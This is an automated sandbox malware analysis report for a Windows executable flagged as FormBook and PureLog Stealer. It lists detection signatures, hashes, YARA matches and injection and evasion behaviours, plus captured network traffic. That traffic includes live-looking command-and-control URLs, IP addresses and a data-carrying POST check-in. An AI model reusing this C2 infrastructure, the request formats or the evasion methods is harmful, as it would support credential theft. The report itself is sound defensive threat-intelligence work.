Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1435891
MD5: b3316732270c9df8d45c5b7ead0f4064
SHA1: 21fe2d77413a09d783e0151f0b16ccce430ca28f
SHA256: c040726eab61fc794f91f7d7712de11b4955c76db950e3b85ef57d413b15eb87
Tags: exe
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.linbreoffice.org/qruc/ Avira URL Cloud: Label: malware
Source: http://www.klingerlumberltd.com/qruc/?K0J=ebDTRVV8VZr&oB1d=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2hcokdL8Q9MgXuVmgdyCbuMpnnH80A0= Avira URL Cloud: Label: malware
Source: http://www.linbreoffice.org/qruc/?K0J=ebDTRVV8VZr&oB1d=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQRfJBsE/jQutHm2oMvc1KqjOm02x0DQ= Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
Yara detected FormBook
Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2734692610.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000000.2915078639.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B7C0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0036B7C0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 070D9EA4h 0_2_070D937B
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 070D9EA4h 0_2_070D96F8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 4x nop then xor eax, eax 8_2_00359470

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.12:49729 -> 109.123.121.243:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.quantumboulevard.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.225.91.73 64.225.91.73
Source: Joe Sandbox View IP Address: 66.29.135.159 66.29.135.159
Source: Joe Sandbox View IP Address: 109.70.148.57 109.70.148.57
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View ASN Name: UK2NET-ASGB UK2NET-ASGB
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /qruc/?K0J=ebDTRVV8VZr&oB1d=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2hcokdL8Q9MgXuVmgdyCbuMpnnH80A0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.klingerlumberltd.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?oB1d=UAq9CzGRql0qbxLGxVHqg5bf0CZ8rOmIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRMVrUBL+8Gy/k2I5T6z62CfhcpnnIk8mA5gg=&K0J=ebDTRVV8VZr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.gattosat.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?K0J=ebDTRVV8VZr&oB1d=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQRfJBsE/jQutHm2oMvc1KqjOm02x0DQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.linbreoffice.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?oB1d=TKQjCngekOUXb4wXltIPy/Q8yQpui0ExkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DtV2YStFMFWvJ0j7VceHyQH2xgQtUsq8+akA=&K0J=ebDTRVV8VZr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.quantumboulevard.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic DNS traffic detected: DNS query: www.klingerlumberltd.com
Source: global traffic DNS traffic detected: DNS query: www.gattosat.icu
Source: global traffic DNS traffic detected: DNS query: www.linbreoffice.org
Source: global traffic DNS traffic detected: DNS query: www.quantumboulevard.xyz
Source: unknown HTTP traffic detected: POST /qruc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.gattosat.icuConnection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.gattosat.icuReferer: http://www.gattosat.icu/qruc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 6f 42 31 64 3d 5a 43 43 64 42 45 2b 78 67 31 42 4f 46 52 2f 4b 79 48 37 32 79 4c 48 53 34 79 30 77 70 6f 32 73 6c 44 6a 46 32 68 61 61 4c 74 62 6e 4a 31 4b 67 54 77 39 6e 47 4f 4b 5a 63 53 45 4d 6d 49 4a 49 6e 47 55 49 4b 34 74 55 63 34 4f 64 36 50 4a 74 5a 65 48 6a 41 79 33 78 42 65 6d 39 50 33 44 59 67 5a 74 6c 36 43 33 43 46 38 31 6d 6f 58 7a 4a 6b 72 66 7a 38 79 68 4a 70 49 30 36 57 37 6e 74 67 76 68 44 77 4e 2f 72 37 41 2f 76 43 41 50 6f 69 76 30 78 55 56 6b 68 2f 35 42 32 6e 6f 77 5a 6e 6e 7a 68 4c 37 2f 61 79 33 63 34 6d 55 36 78 2f 6d 76 6f 4a 61 5a 73 6a 37 73 6f 38 54 4a 42 74 41 3d 3d Data Ascii: oB1d=ZCCdBE+xg1BOFR/KyH72yLHS4y0wpo2slDjF2haaLtbnJ1KgTw9nGOKZcSEMmIJInGUIK4tUc4Od6PJtZeHjAy3xBem9P3DYgZtl6C3CF81moXzJkrfz8yhJpI06W7ntgvhDwN/r7A/vCAPoiv0xUVkh/5B2nowZnnzhL7/ay3c4mU6x/mvoJaZsj7so8TJBtA==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 09:25:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:25:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:25:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:26:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:26:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: file.exe String found in binary or memory: http://ocsp.comodoca.com0
